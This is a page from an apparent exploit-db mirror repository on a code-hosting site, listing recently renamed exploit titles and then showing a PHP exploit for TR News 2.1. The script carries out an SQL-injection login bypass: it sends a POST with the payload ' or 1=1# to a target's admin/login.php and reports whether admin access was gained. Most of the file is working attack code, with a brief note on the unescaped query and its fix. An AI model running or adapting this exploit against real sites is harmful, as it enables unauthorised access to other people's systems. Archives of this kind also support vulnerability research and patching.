bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/6991.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

94 lines
2.2 KiB
Text
Executable file
Raw Blame History

<?php
error_reporting(0);
/*
------------------------------------------------------
TR News <= 2.1 (login.php) Remote Login ByPass Exploit
------------------------------------------------------
By StAkeR[at]hotmail[dot]it
http://www.easy-script.com/scripts-dl/trscript-21.zip
File admin/login.php
1. <?
2. if(isset($_POST['login_ad']) && ($_POST['password']))
3. {
4. include("../include/connexion.php");
5. $login=$_POST["login_ad"];
6. $pass=md5($_POST["password"]);
7. $sql="SELECT * FROM tr_user_news WHERE pseudo='$login' AND pass='$pass';";
8. $p = mysql_query($sql);
9. $row = mysql_fetch_assoc($p);
10. $admin = $row['admin'];
11. if($admin != 1)
$login = $_POST"login_ad"]; isn't escaped,so you can insert SQL code...
how to fix? sanize $login with mysql_real_escape_string or htmlentities
NOTE:
if the website is vulnerable,you must go to admin/login.php
Username: ' or 1=1#
Password: no-deface
*/
if(preg_match('/http://(.+?)/i',$argv[1]) or empty($argv[1])) athos();
$host = explode('/',$argv[1]);
$auth = "login_ad=%27+or+1%3D1%23&password=athos";
$data = "POST /$host[1]/admin/login.php HTTP/1.1\r\n".
"Host: $host[0]\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".strlen($auth)."\r\n\r\n".
"$auth\r\n\r\n";
if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!\n");
if(!fputs($socket,$data)) die("fputs() error!\n");
while(!feof($socket))
{
$content .= fgets($socket);
} fclose($socket);
if(preg_match("/location: main\.php\?mode=main/i",$content))
{
exploiting();
echo "\n[+] Exploit Successfully!\n[+] Site Vulnerable\n";
exit;
}
else
{
exploiting();
echo "\n[+] Exploit Failed!\n[+] Site Not Vulnerable!\n";
exit;
}
function athos()
{
global $argv;
echo "[+] TR News <= 2.1 (login.php) Remote Login ByPass Exploit\n";
echo "[+] Usage: php $argv[0] [host/path]\r\n";
exit;
}
function exploiting()
{
echo "[+] Exploiting";
for($i=0;$i<=3;$i++)
{
echo ".";
sleep(1);
}
}
# milw0rm.com [2008-11-04]
Reference in a new issue View git blame Copy permalink